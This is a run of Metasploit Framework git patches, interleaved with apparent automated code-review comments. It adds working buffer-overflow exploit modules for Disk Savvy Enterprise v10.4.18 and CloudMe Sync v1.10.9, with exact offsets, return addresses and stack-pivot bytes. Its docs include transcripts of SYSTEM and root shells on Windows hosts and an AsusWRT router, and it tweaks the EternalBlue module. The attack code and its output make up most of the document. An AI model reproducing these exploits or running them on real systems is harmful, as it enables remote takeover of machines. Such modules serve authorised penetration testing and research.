exploit(windows/misc/disk_savvy_adm) > exploit + +[*] Started bind handler +[*] Encoded stage with x86/shikata_ga_nai +[*] Sending encoded stage (267 bytes) to 192.168.216.55 +[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500 + +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32>whoami +whoami +nt authority\system + +C:\Windows\system32> +``` From 929027ab96c9390dc7584e906008ccba7b3e2ec7 Mon Sep 17 00:00:00 2001 
From: Daniel Teixeira
Date: Wed, 14 Feb 2018 20:35:32 +0000
Subject: [PATCH 09/33] Disk Savvy Server Buffer Overflow
---
 .../exploits/windows/misc/disk_savvy_adm.rb | 76 +++++++++++++++++++
 1 file changed, 76 insertions(+)
 create mode 100644 modules/exploits/windows/misc/disk_savvy_adm.rb
diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb
new file mode 100644
index 0000000000..1495ad5de3
--- /dev/null
+++ b/modules/exploits/windows/misc/disk_savvy_adm.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Disk Savvy Enterprise v10.4.18',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in Disk Savvy Enterprise v10.4.18, caused by improper bounds
+ checking of the request sent to the built-in server. This module
+ has been tested successfully on Windows 7 SP1 x86.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Daniel Teixeira'
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x02\x0a\x0d\xf8",
+ 'Space' => 355
+ },
+ 'Targets' =>
+ [
+ [ 'Disk Savvy Enterprise v10.4.18',
+ {
+ 'Offset' => 124,
+ 'Ret' => 0x10056d13
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jan 31 2017',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(9124)])
+
+ end
+
+ def exploit
+ connect
+
+ buffer = make_nops(target['Offset'])
+ buffer << "\x90\x09\xEB\x05"
+ buffer << [target.ret].pack('V')
+ buffer << make_nops(10)
+ buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20
+ buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string
+ buffer << make_nops(441)
+ buffer << payload.encoded
+
+ header = "\x75\x19\xba\xab"
+ header << "\x03\x00\x00\x00"
+ header << "\x00\x40\x00\x00"
+ header << [buffer.length].pack("V")
+ header << [buffer.length].pack("V")
+ header << [buffer[-1].ord].pack("V")
+ packet = header
+ packet << buffer
+
+ sock.put(packet)
+ handler
+ end
+end
\ No newline at end of file
From 630e9dd0de96ebd86e053f86731e9e0182a97ee1 Mon Sep 17 00:00:00 2001
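Review bot: The module metadata has no 'References' entry, so nothing in the file tells a reader where the Offset, Ret and BadChars values were derived from; add `'References' => [ ['EDB', '<EDB-ID placeholder>'] ]` next to 'License' once the advisory id is confirmed. The six header dwords built in exploit (`"\x75\x19\xba\xab"`, `"\x03\x00\x00\x00"`, `"\x00\x40\x00\x00"`, the length sent twice and `[buffer[-1].ord].pack("V")`) carry no comment at all; one line per field naming what the server reads it as — presumably a magic, a command id and flags, the payload length, and the last payload byte — is what a maintainer needs to re-derive the packet when the protocol changes. `'Ret' => 0x10056d13` likewise wants a trailing comment naming the module it lives in and whether that module is loaded at a fixed base, which is the first thing checked when the exploit stops working.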
From: Daniel Teixeira Date: Wed, 14 Feb 2018 20:40:32 +0000 Subject: [PATCH 10/33] Verification steps update --- .../modules/exploit/windows/misc/disk_savvy_adm.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md index ad83328205..0f655ba606 100644 --- a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -3,13 +3,13 @@ [DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). ## Verification Steps - 1. Install a vulnerable DiskSavvy Enterprise - 6. Start `msfconsole` - 3. Do `exploit/windows/misc/disk_savvy_adm` - 4. Do `set RHOST ip` - 5. Do `set PAYLOAD windows/shell/bind_tcp` - 13. Do `exploit` - 7. Enjoy you shell + 1. Install a vulnerable DiskSavvy Enterprise + 2. Start `msfconsole` + 3. Do `exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 6. Do `exploit` + 7. Enjoy you shell ## Scenarios From 651ddbb7eb3f93d38d4e1d81c5ac597287f90984 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 15 Feb 2018 10:09:07 +0000 Subject: [PATCH 11/33] Disk Savvy Server Buffer Overflow --- modules/exploits/windows/misc/disk_savvy_adm.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb index 1495ad5de3..db32093455 100644 --- a/modules/exploits/windows/misc/disk_savvy_adm.rb +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Disk Savvy Enterprise v10.4.18', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability - in Disk Savvy Enterprise v10.4.18, caused by improper bounds - checking of the request sent to the built-in server. This module + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module has been tested successfully on Windows 7 SP1 x86. }, 'License' => MSF_LICENSE, @@ -73,4 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(packet) handler end -end \ No newline at end of file +end From 74021d95702f26dbbe94b24ab420d7bd953f30d4 Mon Sep 17 00:00:00 2001 From: klayklogg Date: Wed, 21 Feb 2018 00:37:54 +1300 Subject: [PATCH 12/33] Fix silent fail on missing argument to wmap_sites -d idx --- plugins/wmap.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/plugins/wmap.rb b/plugins/wmap.rb index 6039d7a159..9016171098 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -140,11 +140,11 @@ class Plugin::Wmap < Msf::Plugin end when '-d' del_idx = args - if del_idx + if !del_idx.empty? delete_sites(del_idx.select {|d| d =~ /^[0-9]*$/}.map(&:to_i).uniq) return else - print_error("Provide index of site to delete") + print_error("No index provided.") end when '-l' view_sites From ea9b6d894d2870a13b3abc3aa822619c981b6551 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 20 Feb 2018 09:38:24 -0600 Subject: [PATCH 13/33] add missing payload specs --- spec/modules/payloads_spec.rb | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) 
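Review bot: The fixed guard in wmap.rb reads backwards as a negated predicate with an else branch; put the error path first, `if del_idx.empty?` / `print_error("No index provided.")` / `else` / the `delete_sites` call and `return`, or use a guard clause `return print_error("No index provided.") if del_idx.empty?` ahead of the call. With the empty-argument case now handled, the filter on the next context line, `d =~ /^[0-9]*$/`, is what decides which tokens are deleted, and `*` with line anchors accepts an empty token and a token with a newline in it; `\A\d+\z` is the strict form. The enclosing `when` chain starts and ends outside the hunk.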
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 8cf970240b..ae0e104270 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1971,6 +1971,28 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'osx/x64/exec' end + context 'osx/x64/meterpreter/bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/bind_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/bind_tcp' + end + + context 'osx/x64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/reverse_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/reverse_tcp' + end + context 'osx/x64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From f89cebbd89f5957473da3d9e1b7da622c691bd9f Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 20 Feb 2018 19:35:10 +0000 Subject: [PATCH 14/33] Add sploit doc --- .../exploit/linux/http/asuswrt_lan_rce.md | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/asuswrt_lan_rce.md diff --git a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md new file mode 100644 index 0000000000..914f862489 --- /dev/null +++ b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md 
@@ -0,0 +1,70 @@ +## Description + + This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`. + + +## Vulnerable Application + + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode. + + This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user. + + This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743. + + Numerous ASUS models are reportedly affected, but untested. + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploits/linux/http/asuswrt_lan_rce` + 3. `set RHOST [IP]` + 4. `run` + 5. You should get a *root* session + + +## Options + + **ASUSWRTPORT** + + AsusWRT HTTP portal port (default: `80`) + + +## Scenarios +msf > use exploit/linux/http/asuswrt_lan_rce +msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 +rhost => 192.168.132.205 +msf exploit(linux/http/asuswrt_lan_rce) > run + +[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. +[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 +[+] 192.168.132.205:9999 - Success, shell incoming! +[*] Found shell. 
+[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600 + +id +id +/bin/sh: id: not found +/ # cat /proc/cpuinfo +cat /proc/cpuinfo +system type : Broadcom BCM53572 chip rev 1 pkg 8 +processor : 0 +cpu model : MIPS 74K V4.9 +BogoMIPS : 149.91 +wait instruction : no +microsecond timers : yes +tlb_entries : 32 +extra interrupt vector : no +hardware watchpoint : yes +ASEs implemented : mips16 dsp +shadow register sets : 1 +VCED exceptions : not available +VCEI exceptions : not available + +unaligned_instructions : 0 +dcache hits : 2147483648 +dcache misses : 0 +icache hits : 2147483648 +icache misses : 0 +instructions : 2147483648 +/ # From d02bf40d691a1cd6216d24fd047e09a13aa6d34f Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 15:35:43 -0600 Subject: [PATCH 15/33] Modified Exploit Remove NOPS that weren't needed and freed up space for a larger payload. [ticket: #9561] --- modules/exploits/windows/misc/disk_savvy_adm.rb | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb index db32093455..de4da979a3 100644 --- a/modules/exploits/windows/misc/disk_savvy_adm.rb +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, @@ -30,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'BadChars' => "\x00\x02\x0a\x0d\xf8", - 'Space' => 355 + 'Space' => 800 }, 'Targets' => [ 
@@ -50,16 +51,16 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + seh = generate_seh_record(target.ret) connect buffer = make_nops(target['Offset']) - buffer << "\x90\x09\xEB\x05" - buffer << [target.ret].pack('V') - buffer << make_nops(10) - buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20 - buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string - buffer << make_nops(441) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) header = "\x75\x19\xba\xab" header << "\x03\x00\x00\x00" From ab6f6d75d2e79a61f52013d0445d9f0fa1478f2f Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 15:37:40 -0600 Subject: [PATCH 16/33] Update Documentation [ticket: #9561] --- .../modules/exploit/windows/misc/disk_savvy_adm.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md index 0f655ba606..056f7bdd15 100644 --- a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -5,15 +5,15 @@ ## Verification Steps 1. Install a vulnerable DiskSavvy Enterprise 2. Start `msfconsole` - 3. Do `exploit/windows/misc/disk_savvy_adm` + 3. Do `use exploit/windows/misc/disk_savvy_adm` 4. Do `set RHOST ip` 5. Do `set PAYLOAD windows/shell/bind_tcp` 6. Do `exploit` - 7. Enjoy you shell + 7. Enjoy your shell ## Scenarios -###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 +### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 ``` msf > use exploit/windows/misc/disk_savvy_adm From d6206dc046c95fdac31c6f4274d805932dbe54c2 Mon Sep 17 00:00:00 2001 
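Review bot: The hand-assembled stack adjustment (`"\x83\xc4\x7f" * 13` followed by `"\x83\xc4\x21"`, i.e. ADD ESP by 13*0x7f + 0x21 = 0x694) is documented only opcode by opcode; a comment stating why ESP has to move by exactly 0x694 bytes — presumably to land on `payload.encoded` past the SEH record — is what lets a maintainer recompute it when the offset changes. The trailing `Rex::Text.rand_text_alphanumeric(1)` is consumed by the header's `[buffer[-1].ord].pack("V")` outside this hunk, so say so where it is appended: `buffer << Rex::Text.rand_text_alphanumeric(1) # last byte is echoed back in the packet header`. The inline comments also want the conventional space after `#` (`# ADD esp, 7fh`). The enclosing exploit method continues past the hunk into the header construction.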
From: James Lee Date: Tue, 20 Feb 2018 15:48:00 -0600 Subject: [PATCH 17/33] Better regex in finger_users --- .../auxiliary/scanner/finger/finger_users.rb | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index fbe018977d..6873c06844 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary finger_zero finger_dot finger_chars - vprint_status "#{rhost}:#{rport} - Sending finger request for user list: #{finger_user_common.join(", ")}" + vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users" finger_list rescue ::Rex::ConnectionError @@ -168,22 +168,21 @@ class MetasploitModule < Msf::Auxiliary # No such file or directory == valid user bad utmp - # Solaris - if(line =~ /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/) + + case line + when /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/ + # Solaris uid = $1 if ($2 != "Name") @users[uid] ||= {} end - end - # IRIX - if(line =~ /^\s*Login name:\s*([^\s]+)\s+/i) + when /^\s*Login name:\s*([^\s]+)\s+/i + # IRIX uid = $1 @users[uid] ||= {} if uid - end - - # Debian GNU/Linux - if(line =~ /^\s*Username:\s*([^\s]+)\s+/i) + when /^\s*(?:Username|Login):\s*([^\s]+)\s+/i + # Debian GNU/Linux uid = $1 @users[uid] ||= {} if uid end From ff3b318abde1ad288cce9b1cef3ae9846b63ea2b Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 20 Feb 2018 21:56:31 +0000 Subject: [PATCH 18/33] CloudMe Sync Client documentation --- .../exploit/windows/misc/cloudme_sync.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/exploit/windows/misc/cloudme_sync.md 
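Review bot: The new `when` branches in finger_users.rb still read captures through `$1` and `$2`; now that the matching is a `case` over regex literals, `Regexp.last_match(1)` or a named group such as `(?<uid>[^\s]+)` reads better and survives a later reorder of the branches. The Solaris branch keeps a parenthesised condition, `if ($2 != "Name")`; `if Regexp.last_match(2) != "Name"` is the conventional form. The `@users[uid] ||= {} if uid` guards in the IRIX and Debian branches are dead, since a `([^\s]+)` group that matched cannot be nil. The enclosing method starts and ends outside the hunk.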
diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md new file mode 100644 index 0000000000..04e5edb6a7 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md 
@@ -0,0 +1,66 @@ + +## Verification Steps + 1. Install CloudMe for Desktop version `v1.10.9` + 2. Create a free account and start the applicaton + 6. Start `msfconsole` + 4. Do `use exploit/windows/misc/cloudme_sync` + 5. Do `set RHOST ip` + 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` + 12. Do `set LHOST ip` + 13. Do `exploit` + 14. Verify the Meterpreter session is opened + +## Scenarios + +### CloudMe Sync client application on Windows 7 SP1 + +``` +msf > use exploit/windows/misc/cloudme_sync +msf exploit(windows/misc/cloudme_sync) > show options + +Module options (exploit/windows/misc/cloudme_sync): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 172.16.40.148 yes The target address + RPORT 8888 yes The target port (TCP) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 172.16.40.5 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 CloudMe Sync v1.10.9 + + +msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 +RHOST => 172.16.40.148 +msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 +LHOST => 172.16.40.5 +msf exploit(windows/misc/cloudme_sync) > exploit + +[*] Started reverse TCP handler on 172.16.40.5:4444 +[*] Sending stage (179779 bytes) to 172.16.40.148 +[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000 + +meterpreter > sysinfo +Computer : PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : pt_PT +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > +``` \ No newline at end of file 
From 745ad4d727b83c5c667c27714849b04528891c0e Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 20 Feb 2018 21:57:13 +0000 Subject: [PATCH 19/33] CloudMe Sync Client BoF --- modules/exploits/windows/misc/cloudme_sync.rb | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/exploits/windows/misc/cloudme_sync.rb
diff --git a/modules/exploits/windows/misc/cloudme_sync.rb b/modules/exploits/windows/misc/cloudme_sync.rb
new file mode 100644
index 0000000000..017a46b1e5
--- /dev/null
+++ b/modules/exploits/windows/misc/cloudme_sync.rb
@@ -0,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CloudMe Sync v1.10.9',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in CloudMe Sync v1.10.9 client application. This module has been
+ tested successfully on Windows 7 SP1 x86.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hyp3rlinx', # Original exploit author
+ 'Daniel Teixeira' # MSF module author
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2018-6892'],
+ [ 'EDB', '44027' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00",
+ },
+ 'Targets' =>
+ [
+ [ 'CloudMe Sync v1.10.9',
+ {
+ 'Offset' => 2232,
+ 'Ret' => 0x61e7b7f6
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jan 17 2018',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(8888)])
+
+ end
+
+ def exploit
+ connect
+
+ buffer = make_nops(target['Offset'])
+ buffer << generate_seh_record(target.ret)
+ buffer << make_nops(10)
+ buffer << payload.encoded
+ buffer << make_nops(5600)
+
+ sock.put(buffer)
+ handler
+ end
+end
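Review bot: `'Ret' => 0x61e7b7f6` has no comment naming the DLL it was taken from or whether that module is loaded without ASLR/SafeSEH, which is the first thing a maintainer checks when the SEH overwrite stops working; add `'Ret' => 0x61e7b7f6 # <gadget> in <module name placeholder> — TODO confirm`. `'Name' => 'CloudMe Sync v1.10.9'` states only the product and version, where the AsusWRT module earlier in this series names the vulnerability class; `'CloudMe Sync v1.10.9 Stack Buffer Overflow'` is consistent with the Description. The Payload hash sets BadChars but no 'Space', so the framework has no way to reject an encoded payload larger than the overflowed buffer tolerates; if the limit is known from the original exploit, declare it there.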
From 04882b046447b03f1cb278e7bfbf8556afb3ba39 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 20 Feb 2018 22:00:36 +0000 Subject: [PATCH 20/33] Fixed indentation --- .../modules/exploit/windows/misc/cloudme_sync.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md index 04e5edb6a7..13e32e217c 100644 --- a/documentation/modules/exploit/windows/misc/cloudme_sync.md +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md @@ -1,10 +1,10 @@ ## Verification Steps - 1. Install CloudMe for Desktop version `v1.10.9` + 1. Install CloudMe for Desktop version `v1.10.9` 2. Create a free account and start the applicaton 6. Start `msfconsole` - 4. Do `use exploit/windows/misc/cloudme_sync` - 5. Do `set RHOST ip` + 4. Do `use exploit/windows/misc/cloudme_sync` + 5. Do `set RHOST ip` 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` 12. Do `set LHOST ip` 13. Do `exploit` @@ -63,4 +63,4 @@ Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > -``` \ No newline at end of file +``` From 6a62ca15e70e8cd8d7004de3d7fb14cb0953825a Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 17:40:33 -0600 Subject: [PATCH 21/33] Remove NOPS [ticket: #9594] --- modules/exploits/windows/misc/cloudme_sync.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/windows/misc/cloudme_sync.rb b/modules/exploits/windows/misc/cloudme_sync.rb index 017a46b1e5..5d6d885004 100644 --- a/modules/exploits/windows/misc/cloudme_sync.rb +++ b/modules/exploits/windows/misc/cloudme_sync.rb @@ -59,9 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote buffer = make_nops(target['Offset']) buffer << generate_seh_record(target.ret) - buffer << make_nops(10) buffer << payload.encoded - buffer << make_nops(5600) sock.put(buffer) handler 
From a23240a742886fcc6a3042741f5274a66e55ef77 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 17:48:21 -0600 Subject: [PATCH 22/33] Update Documentation [ticket: #9594] --- .../exploit/windows/misc/cloudme_sync.md | 41 ++++--------------- 1 file changed, 8 insertions(+), 33 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md index 13e32e217c..dad36f3df3 100644 --- a/documentation/modules/exploit/windows/misc/cloudme_sync.md +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md 
@@ -1,47 +1,22 @@ +## Description +This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe). ## Verification Steps 1. Install CloudMe for Desktop version `v1.10.9` - 2. Create a free account and start the applicaton - 6. Start `msfconsole` + 2. Start the applicaton (you don't need to create an account) + 3. Start `msfconsole` 4. Do `use exploit/windows/misc/cloudme_sync` 5. Do `set RHOST ip` - 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` - 12. Do `set LHOST ip` - 13. Do `exploit` - 14. Verify the Meterpreter session is opened + 6. Do `set LHOST ip` + 7. Do `exploit` + 8. Verify the Meterpreter session is opened ## Scenarios -### CloudMe Sync client application on Windows 7 SP1 +### CloudMe Sync client application on Windows 7 SP1 x86 ``` msf > use exploit/windows/misc/cloudme_sync -msf exploit(windows/misc/cloudme_sync) > show options - -Module options (exploit/windows/misc/cloudme_sync): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST 172.16.40.148 yes The target address - RPORT 8888 yes The target port (TCP) - - -Payload options (windows/meterpreter/reverse_tcp): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) - LHOST 172.16.40.5 yes The listen address - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 CloudMe Sync v1.10.9 - - msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 RHOST => 172.16.40.148 msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp From af45c1764b23aeac1294f4aeea046a8602476cf1 Mon Sep 17 00:00:00 2001 
From: Aaron Soto Date: Wed, 21 Feb 2018 13:40:04 -0600 Subject: [PATCH 23/33] Tweak exception handling and timing of `ms17_010_eternalblue` --- .../windows/smb/ms17_010_eternalblue.rb | 24 +++++++++++++++---- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 34582476a6..022cfe0a6f 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', + 'EXITFUNC' => 'thread', + 'WfsDelay' => 5, }, 'Privileged' => true, 'Payload' => @@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote # we don't need this sleep, and need to find a way to remove it # problem is session_count won't increment until stage is complete :\ secs = 0 - while !session_created? and secs < 5 + while !session_created? and secs < 30 secs += 1 sleep 1 end @@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote rescue EternalBlueError => e print_error("#{e.message}") + return false + rescue ::RubySMB::Error::NegotiationFailure + print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.") + return false rescue ::RubySMB::Error::UnexpectedStatusCode, ::Errno::ECONNRESET, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, - ::Rex::ConnectionRefused => e + ::Rex::ConnectionRefused, + ::RubySMB::Error::CommunicationError => e print_error("#{e.class}: #{e.message}") + report_failure + return false rescue => error print_error(error.class.to_s) print_error(error.message) print_error(error.backtrace.join("\n")) + return false ensure # pass end @@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote end end + ''' # # Increase the default delay by five seconds since some kernel-mode # payloads may not run immediately. 
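Review bot: The rewritten loop condition `while !session_created? and secs < 30` combines a negated `while` with `and`, whose low precedence is a standing trap in conditions; `until session_created? || secs >= 30` says the same thing without either. The 30-second ceiling now sits next to the `'WfsDelay' => 5` default added in the first hunk, and nothing says which of the two waits is expected to fire first; a one-line comment on the loop would settle that. The enclosing method starts and ends outside the hunk.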
